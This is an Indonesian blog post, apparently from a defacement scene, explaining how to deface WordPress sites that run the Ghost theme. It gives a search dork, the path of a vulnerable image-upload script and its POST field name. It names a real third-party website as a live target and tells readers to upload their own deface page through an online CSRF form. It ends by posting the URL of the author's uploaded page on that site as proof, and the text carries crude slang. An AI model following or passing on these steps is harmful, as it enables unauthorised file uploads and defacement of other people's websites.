Assalamualaikum wr.wb
Masih inget gw kan $ADMIN$ pasti inget lahh :v
Wkwkw
Ok langsung gass aja
1.Dork:
Inurl:/wp-content/themes/Ghost/
2.exploit:/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Postfile:Filedata
Yoo tutor nyaa pertama lu ngedork
Dan gw ada live target wowkwok http://www.juvankoski.com/
Terus lu kasih Exploit http://www.juvankoski.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Klo vuln liat bawah
Terus ngapain lagi yahh ke csrf online lahh postfile lihat atas
Terus kunci target wkwkw upload SC kesayangan kalian
Akses??? /wp-content/uploads/settingsimages/SC.html
Bum bam bum kontol gede
Akhirnya bisa juga ke upload
Hasil gw http://www.juvankoski.com/wp-content/uploads/settingsimages/stct.html
Ok sekian dari gw 😁 assalamualaikum
Belum ada tanggapan untuk "Deface metode wp-ghost with csrf"
Posting Komentar